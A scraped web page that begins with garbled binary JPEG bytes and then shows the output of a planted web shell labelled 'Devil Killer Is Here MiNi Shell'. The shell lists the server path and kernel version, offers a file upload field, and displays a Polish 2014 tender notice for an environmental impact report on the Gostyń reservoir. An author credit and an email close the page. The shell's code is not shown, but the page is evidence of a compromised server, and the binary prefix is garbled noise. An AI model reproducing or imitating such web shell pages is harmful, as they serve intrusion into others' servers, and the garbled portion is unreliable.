JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/96788-N-2014.html

<p class="kh_header"><b>Leszno: SPORZĄDZENIE RAPORTU ODDZIAŁYWANIA NA ŚRODOWISKO 
DLA PRZEDSIĘWZIĘCIA : ZBIORNIK GOSTYŃ.</b><br>
<b>Numer ogłoszenia: 96788 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu Rejonowy Oddział w Lesznie , ul. Śniadeckich 5, 64-100 Leszno, woj. wielkopolskie, tel. 065 5295640, faks 065 5295671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.pl i www.melioracja.leszno.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPORZĄDZENIE RAPORTU ODDZIAŁYWANIA NA ŚRODOWISKO 
DLA PRZEDSIĘWZIĘCIA : ZBIORNIK GOSTYŃ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Zakres zamówienia obejmuje:
1. Opis planowanego przedsięwzięcia.
- charakterystykę całego przedsięwzięcia i warunki użytkowania terenu w fazie budowy i eksploatacji lub użytkowania
- główne cechy charakterystyczne procesów produkcyjnych
- przewidywane rodzaje i ilości zanieczyszczeń, wynikające z funkcjonowania planowanego przedsięwzięcia
2. Opis elementów przyrodniczych środowiska objętych zakresem przewidywanego oddziaływania planowanego przedsięwzięcia na środowisko, w tym elementów środowiska objętych ochroną na podstawie ustawy z dnia 16.04.2004 r. o ochronie przyrody (tj. Dz. U. z 2013 r., poz. 627) oraz opis ewentualnego oddziaływania planowanego przedsięwzięcia na w/w elementy środowiska.
3. Opis istniejących w sąsiedztwie lub w bezpośrednim zasięgu oddziaływania planowanego przedsięwzięcia zabytków chronionych na podstawie przepisów o ochronie zabytków i opiece nad zabytkami.
4. Opis przewidywanych skutków dla środowiska w przypadku niepodejmowania przedsięwzięcia.
5. Opis analizowanych wariantów wraz z uzasadnieniem ich wyboru, w tym:
- wariantu proponowanego przez wnioskodawcę
- racjonalnego wariantu alternatywnego
- wariantu najkorzystniejszego dla środowiska.
Należy dokonać szczegółowej analizy wariantów planowanego przedsięwzięcia , w tym wariantu polegającego na niepodejmowaniu przedsięwzięcia.
6. Określenie przewidywanego oddziaływania na środowisko analizowanych wariantów, w tym także w przypadku wystąpienia poważnej awarii przemysłowej, a także możliwego transgranicznego oddziaływania na środowisko.
7. Uzasadnienie proponowanego przez wykonawcę wariantu, ze wskazaniem jego oddziaływania na środowisko, w szczególności na:
- ludzi, rośliny, zwierzęta, grzyby, siedliska przyrodnicze, wodę i powietrze
- powierzchnię ziemi, z uwzględnieniem ruchów masowych ziemi, klimat i krajobraz
- dobra materialne
- zabytki i krajobraz kulturowy, objęte istniejącą dokumentacją, w szczególności rejestrem lub ewidencją zabytków
- wzajemne oddziaływanie między powyższymi elementami.
8. Opis metod prognozowania zastosowanych przez wnioskodawcę oraz opis przewidywanych znaczących oddziaływań planowanego przedsięwzięcia na środowisko, obejmujący bezpośrednie, pośrednie, wtórne, skumulowane, krótko, średnio  i długoterminowe, stałe i chwilowe oddziaływania na środowisko, wynikające z:
- istnienia przedsięwzięcia
- wykorzystywania zasobów środowiska
- emisji.
9. opis przewidywanych działań mających na celu zapobieganie, ograniczanie lub kompensację przyrodniczą negatywnych oddziaływań na środowisko, w szczególności na cele i przedmiot ochrony obszaru Natura 2000 oraz integralność tego obszaru.
10. jeżeli planowane przedsięwzięcie jest związane z użyciem instalacji, porównanie proponowanej technologii z technologią spełniającą wymagania, o których mowa w art. 143 ustawy z 27.04.2001r. - Prawo ochrony środowiska.
11. Wskazanie, czy dla planowanego przedsięwzięcia jest konieczne ustanowienie obszaru ograniczonego użytkowania w rozumieniu przepisów ustawy z 27.04.2001r.Prawo ochrony środowiska, oraz określenie  granic takiego obszaru, ograniczeń w zakresie przeznaczenia terenu, wymagań technicznych dotyczących obiektów budowlanych i sposobów korzystania z nich.
12. Przedstawienie zagadnień w formie graficznej.
13. Przedstawienie zagadnień w formie kartograficznej w skali odpowiadającej przedmiotowi i szczegółowości analizowanych w raporcie zagadnień oraz umożliwiającej kompleksowe przedstawienie przeprowadzonych analiz oddziaływania przedsięwzięć na środowisko.
14. Analizę możliwych konfliktów społecznych  związanych z planowanym przedsięwzięciem.
15. Przedstawienie propozycji monitoringu oddziaływania planowanego przedsięwzięcia na etapie jego budowy i eksploatacji lub użytkowania, w szczególności na cele i przedmiot ochrony obszaru Natura 2000 oraz integralność tego obszaru.
16. Wskazanie trudności wynikających z niedostatków techniki lub luk we współczesnej wiedzy, jakie napotkano, opracowując raport.
17. Streszczenie w języku niespecjalistycznym informacji zawartych w raporcie, w odniesieniu do każdego elementu raportu.
18. Nazwisko osoby lub osób sporządzających raport.
19. Źródła informacji stanowiące podstawę do sporządzenia raportu.
Raport o oddziaływaniu przedsięwzięcia na środowisko powinien uwzględniać oddziaływanie przedsięwzięcia na etapach jego realizacji, eksploatacji lub użytkowania oraz likwidacji.
Raport w szczególności powinien odnieść się do poniższych zagadnień:
l. W zakresie ochrony wód powierzchniowych i gospodarki wodnościekowej:
1)opisać planowane  przedsięwzięcie, sposób jego  funkcjonowania oraz przedstawić zakres wszystkich czynności i prac budowlanych planowanych do
wykonania w ramach realizacji przedmiotowego przedsięwzięcia,
2) realizację przedsięwzięcia odnieść do przepisów rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007 r. w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie (Dz.U. z 2007 r. Nr 86, póz. 579),
3) odnieść się do art. 81 ust. 3 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz   o   ocenach   oddziaływania   na   środowisko   i   wyjaśnić,   czy   przedmiotowe przedsięwzięcie może spowodować nieosiągnięcie celów środowiskowych zawartych w Planie gospodarowania wodami na obszarze dorzecza Odry. Odpowiedź proszę szczegółowo   uzasadnić   odwołując   się do zapisów ww. dokumentu oraz przepisów ustawy z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2012 r., póz. 145 ze zm.),
4)przedstawić bilans wodny planowanego zbiornika, z uwzględnieniem minimalnych
i maksymalnych  przepływów,  w  tym  przepływu  nienaruszalnego  (z  ustaleniem
sposobu jego wyznaczenia), zmian przepływu w poszczególnych miesiącach roku,
parowania oraz przewidywanych rozbiorów wody,
5)przeanalizować i opisać oddziaływanie zbiornika na przepływy w rzece Kania oraz na obszary  objęte  ochroną,   w   tym   strefy  ochronne   ujęć  wód   oraz   ujęcia wód podziemnych.
6) przedstawić wpływ planowanej  inwestycji  na istniejące warunki wodne poniżej
zbiornika,
7) przedstawić informacje na temat stanu gospodarki wodnościekowej w obszarze
oddziaływania zbiornika,
8) przedstawić działania mające na celu ochronę i poprawę jakości wód zbiornika,
9) opisać sposób zapewnienia przepływu w rzece Kani oraz w rzece Starej Kani w czasie budowy planowanego zbiornika,
10) przedstawić rozwiązania w zakresie gospodarki wodnościekowej ukierunkowane na ochronę wód rzeki Kania i rzeki Stara Kania na etapie realizacji przedsięwzięcia.
2. W zakresie hydrogeologii:
1) przedstawić opis budowy geologicznej i hydrogeologicznej w obrębie oddziaływania zbiornika uwzględniając ewentualne ujęcia wody (głębsza budowa geologiczna) oraz przedstawić związki hydrauliczne wód gruntowych z wodami powierzchniowymi (obszary drenażu i zasilania, poziomy wodonośne, GZWP, ujęcia wody wraz ze strefami ochronnymi),
2) przedstawić sposoby monitoringu wód powierzchniowych i podziemnych na obszarze planowanej inwestycji uwzględniając punkty pomiarowe,
3) przedstawić opis oddziaływania zbiornika na tereny przyległe, w tym przedstawić
informacje  odnośnie  wystąpienia ewentualnych  podtopień  w  stosunku  do  stanu
aktualnego, wraz z ich zaznaczeniem na załączniku graficznym.
4) opisać    wpływ    oddziaływania   zbiornika   przy   NPP    i    MaxPP    i    przedstawić wymagane informacje w formie graficznej,
5) opisać zagrożenia wynikające z budowy oraz eksploatacji zbiornika z uwzględnieniem erozji wgłębnej, spływu substancji biogennych z terenów przyległych do zbiornika, kolmatacji zbiornika,
6) opisać technologię prowadzenia prac budowlanych, przedstawić zagrożenia dla środowiska gruntowo-wodnego na etapie realizacji oraz podać rozwiązania minimalizujące to oddziaływanie.
3. W zakresie gospodarki odpadami:
1) przedstawić rodzaje, szacunkowe ilości oraz sposoby zagospodarowania odpadów
poszczególnych  rodzajów,  które mogą powstać  na etapie  budowy,  eksploatacji
i likwidacji przedsięwzięcia z uwzględnieniem ustawy o odpadach z dnia 14 grudnia
2012 r. (Dz.U. z 2013 r. póz. 21),
2) w przypadku magazynowania odpadów, w szczególności niebezpiecznych, wskazać rozwiązania chroniące środowisko gruntowo-wodne przed jego zanieczyszczeniem,
3) wskazać sposoby zapobiegania powstawaniu odpadów lub ograniczania ich ilości
oraz negatywnego oddziaływania na środowisko.
4. W zakresie ochrony przyrody:
1) przedstawić opis elementów przyrodniczych środowiska objętych zakresem
przewidywanego przedsięwzięcia, w szczególności elementów objętych ochroną na
podstawie ustawy z  16 kwietnia 2004 r. o ochronie przyrody. Opis ten powinien
zawierać informacje o występowaniu na obszarze objętym oddziaływaniem gatunków grzybów (w tym porostów), roślin, i zwierząt objętych ochroną. Należy wykazać wszystkie siedliska przyrodnicze chronione na mocy Dyrektywy Siedliskowej. Opis ten powinien objąć wszystkie tereny, na których będzie realizowana inwestycja, w tym m.in. 7 km długości odcinek Starej Kani, który będzie odbudowywany i tereny, na których będzie gromadzona ziemia z budowy czaszy zbiornika,
2) ocenić wpływ inwestycji, w tym skumulowanego oddziaływania ruchu turystycznego i rekreacji wodnej, na ww. elementy środowiska przyrodniczego. W opisie należy uwzględnić   wpływ   inwestycji   na   środowisko   przyrodnicze   zarówno w miejscu budowy czaszy zbiornika jak i w miejscu na którym będzie gromadzona ziemia z wykopów, wpływ inwestycji na łąki poniżej zbiornika, wpływ regulacji koryta Starej Kani na murszenie gleb na przylegających do tej rzeki łąkach itp.,
3) w przypadku wycinki drzew należy podać informacje na temat liczby, gatunków
i wymiarów drzew, które planuje się wyciąć, wraz z informacjami czy widoczne są na nich gniazda lub dziuple, chronione gatunki owadów i porostów (należy rozważyć
zastosowanie środków minimalizujących ewentualny niekorzystny wpływ wycinki na
środowisko przyrodnicze np. poprzez wskazanie terminu usunięcia drzew i krzewów
poza sezonem lęgowym ptaków),
4) przedstawić propozycję zastosowania środków ograniczających ewentualny
negatywny wpływ inwestycji związany z prowadzonymi pracami. W raporcie należy
odnieść się do wniosków oraz propozycji minimalizujących i rekompensujących
negatywny wpływ przedsięwzięcia zawartych w Ekspertyzie ornitologicznej oraz
herpetologicznej miejsca pod planowaną inwestycję pt. Zbiornik Wodny Gostyń,
gmina Gostyń (M. Szajda, Poznań,  l   czerwca 2013  r.)  Należy jednoznacznie i
konkretnie   opisać   planowane   działania   minimalizujące,   np. wskazać   ilość   i
powierzchnię planowanych do budowy wysp, miejsca, na które nie będzie nawożona
ziemia z wykopów w celu zachowania istniejących zbiorowisk roślinnych, wskazać
konkretnie czy będą sadzone na brzegach drzewa, krzewy i roślinność szuwarowa, a
jeśli tak, należy wskazać te miejsca ora/ podać szacunkową liczbę nasadzeń oraz ich skład gatunkowy, wskazać czy planuje się na korycie rzeki Stara Kania budowę
zastawek lub jazów, a jeśli tak, podać ich liczbę, lokalizację, wysokość piętrzenia itp.
5) Opisać   warianty   planowanego   przedsięwzięcia,   w   tym   wariant   proponowany   przez wnioskodawcę   i   racjonalny   wariant   alternatywny   oraz   wariant  najkorzystniejszy   dla środowiska wraz z uzasadnieniem ich wyboru.
6) Przedstawić   informacje   na   temat   przebudowy   napowietrznych   linii   energetycznych, w szczególności podać podstawowe parametry linii energetycznych, wyjaśnić na czym będzie polegało usunięcie kolizji, czy po usunięciu tej kolizji linie elektroenergetyczne zbliżą się do budynków mieszkalnych: tj. na jaką od-ległość oraz czy zostaną dotrzymane standardy jakości środowiska określone w rozporządzeniu Ministra Śro-dowiska z 30 października 2003 r. w sprawie   dopuszczalnych   poziomów   pól   elektromagnetycznych   w   środowisku   oraz sposobów sprawdzania dotrzymania tych poziomów (Dz. U. Nr 192, póz. 1883).
Uwaga :
Inwestor jest w posiadaniu następujących dokumentów, które udostępni Wykonawcy po podpisaniu umowy:
- Postanowienia Regionalnego Dyrektora Ochrony Środowiska z Poznania WOO-II.4240.9.2014.KL.3 z 19.02.2014r. nakładające obowiązek przeprowadzenia oceny oddziaływania na środowisko przedsię-wzięcia mogącego znacząco oddziaływać na środowisko.
- Postanowienia Wójta Gminy Piaski nr OŚ.6220.09.2013 z 12 marca 2014 r. stwierdzające obowiązek przeprowadzenia oceny oddziaływania na środowisko dla planowanego przedsięwzięcia.
- Koncepcji programowo - przestrzennej z 2007 r.
- Karty informacyjnej przedsięwzięcia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.71.30.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie  ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, sporządzili raport o podobnym profilu do przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Treść oferty - sporządzoną zgodnie z wzorem formularza oferty (wg załącznika SIWZ Formularz oferty).
2.Upoważnienie Wykonawcy do podpisania oferty i występowania w imieniu wykonawcy, o ile nie wynika ono z dokumentów zawartych w ofercie. 
3.	Wykonawcy występujący wspólnie winni dołączyć dokument, w którym ustanawiają pełnomoc-nika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców. Wykonawcy działający wspólnie ponoszą solidarną odpowie-dzialność za wykonanie lub nienależyte wykonanie zamówienia.
4.	Wycenę - 1 szt. sporządzoną zgodnie z opisem sposobu obliczenia ceny oferty (pkt 15.4 SIWZ). 
5.	Zaparafowany projekt umowy (wg Rozdziału II SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający określa warunki dokonania zmian w treści umowy w następujących przypadkach:
a) 	zmiana terminu wykonania umowy  wynikająca z przyczyn niezawinionych przez Wykonawcę, tj. działania siły wyższej, szczególnie niesprzyjających warunków atmosferycznych oraz wydłużających się procedur formalno-prawnych przy wydawaniu decyzji,
b)zmiana terminu płatności za przedmiot zamówienia spowodowana nieterminowym uzyskaniem środków finansowych, z przyczyn niezależnych od Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.pl i www.melioracja.leszno.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Oddział w Lesznie Wielkopolskiego Zarządu Melioracji i Urządzeń Wodnych w Poznaniu, 64-100 Leszno, ul. Śniadeckich 5. 
 pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2014 godzina 09:30, miejsce: Miejsce składania ofert - pok. 7 (I piętro) - Rejonowy Oddział w Lesznie Wielkopolskiego Zarządu Melioracji i Urządzeń Wodnych w Poznaniu, 64-100 Leszno, ul. Śniadeckich 5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com